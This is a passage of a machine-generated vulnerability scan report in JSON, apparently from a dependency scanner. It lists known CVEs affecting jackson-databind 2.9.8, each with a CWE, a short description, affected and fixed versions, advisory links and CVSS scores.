on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9548"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9548/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9547"]}],"cve":"CVE-2020-9547","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2020-05-15T18:59:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-9547"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4accb2e0de9679174efd3d113a059bab71ff3ec53e882790d21c1cc1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r742ef70d126548dcf7de5be5779355c9d76a9aec71d7a9ef02c6398a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra3e90712f2d59f8cef03fa796f5adf163d32b81fe7b95385f21790e6@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0d5d0f72da1ed6fc5e438b1ddb3fa090c73006b55f873cf845375ab@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e958d6d5c5ee16efed73314cd0e445c8dbb4bdcc80fc9d1d6c11fc@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/redbe4f1e21bf080f637cf9fbec47729750a2f443a919765360337428@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium 
Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9547"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9547/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-24750"]}],"cve":"CVE-2020-24750","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2021-12-09T19:15:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-24750"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20201009-0003"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.6.7.5 and from 2.7.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.6"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-24750"},{"summary":"NetApp Advisory ntap-20201009-0003","url":"https://security.netapp.com/advisory/ntap-20201009-0003"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory 
cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.6"]}],"title":"CVE-2020-24750/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35491"]}],"cve":"CVE-2020-35491","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:11","ids":[{"system_name":"CVE Record","text":"CVE-2020-35491"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210122-0005"}],"notes":[{"audience":"developers","category":"other","text":"Improper Control of Dynamically-Managed Code Resources","title":"Additional CWE: 913"},{"category":"description","details":"Vulnerability Description","text":"Serialization 
gadgets exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadgets exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35491"},{"summary":"NetApp Advisory ntap-20210122-0005","url":"https://security.netapp.com/advisory/ntap-20210122-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35491/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36187"]}],"cve":"CVE-2020-36187","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:51","ids":[{"system_name":"CVE Record","text":"CVE-2020-36187"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets 
and typing, related to org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36187"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-36187/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10968"]}],"cve":"CVE-2020-10968","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-10968"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10968"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10968/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42004"]}],"cve":"CVE-2022-42004","cwe":{"id":"400","name":"Uncontrolled Resource Consumption"},"discovery_date":"2022-10-03T00:00:31","ids":[{"system_name":"CVE Record","text":"CVE-2022-42004"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"Gentoo Advisory","text":"glsa-202210-21"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0008"}],"notes":[{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"category":"description","details":"Vulnerability Description","text":"Uncontrolled Resource Consumption in FasterXML jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Uncontrolled Resource Consumption in FasterXML jackson-databind In FasterXML jackson-databind before 2.12.7.1 and in 2.13.x before 2.13.4, resource exhaustion can occur because of a lack of a check in 
BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42004"},{"summary":"Gentoo Advisory glsa-202210-21","url":"https://security.gentoo.org/glsa/202210-21"},{"summary":"NetApp Advisory ntap-20221118-0008","url":"https://security.netapp.com/advisory/ntap-20221118-0008"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2022-42004/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10650"]}],"cve":"CVE-2020-10650","cwe":{"id":"502","name":"Deserialization of Untrusted 
Data"},"discovery_date":"2022-07-15T19:41:47","ids":[{"system_name":"CVE Record","text":"CVE-2020-10650"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpuoct2022"},{"system_name":"NetApp Advisory","text":"ntap-20230818-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind before 2.9.10.4 vulnerable to unsafe deserialization The com.fasterxml.jackson.core:jackson-databind library before version 2.9.10.4 is vulnerable to an Unsafe Deserialization vulnerability when handling interactions related to the class `ignite-jta`."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/04/msg00032.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10650"},{"summary":"NetApp Advisory ntap-20230818-0007","url":"https://security.netapp.com/advisory/ntap-20230818-0007"},{"summary":"Oracle Advisory 
cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpuoct2022","url":"https://www.oracle.com/security-alerts/cpuoct2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-10650/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11111"]}],"cve":"CVE-2020-11111","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:50","ids":[{"system_name":"CVE Record","text":"CVE-2020-11111"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability 
Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11111"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
